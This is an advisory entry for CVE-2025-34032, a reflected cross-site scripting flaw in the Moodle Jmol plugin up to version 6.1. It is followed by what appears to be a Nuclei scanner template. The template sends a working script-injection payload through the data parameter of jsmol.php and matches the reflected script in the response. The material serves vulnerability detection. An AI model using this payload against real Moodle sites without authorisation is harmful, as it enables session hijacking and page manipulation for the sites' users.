A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content.
PoC代码[已公开]
id: CVE-2025-34032
info:
name: Moodle LMS Jmol Plugin <= 6.1 - Cross-Site Scripting
author: madrobot,ritikchaddha
severity: medium
description: |
A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content.
reference:
- https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2025-34032
classification:
epss-score: 0.00247
epss-percentile: 0.47961
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cve-id: CVE-2025-34032
cvss-score: 5.4
cwe-id: CWE-80
metadata:
max-request: 1
tags: cve,cve2025,moodle,xss,edb,vkev
http:
- method: GET
path:
- "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'len(body) == 41'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
condition: and
- type: regex
regex:
- '^<script>alert\(document\.domain\)</script>\s*$'
# digest: 4b0a00483046022100bfd0ee87b3bda2e1a6cd9824ab85ad4df9f6aa316478adb8edd293810eef7f63022100a2215e88fc4da9be17dcb22c0d876f647cd341340c315909872111399f4d3d5e:922c64590222798bb761d5b6d8e72950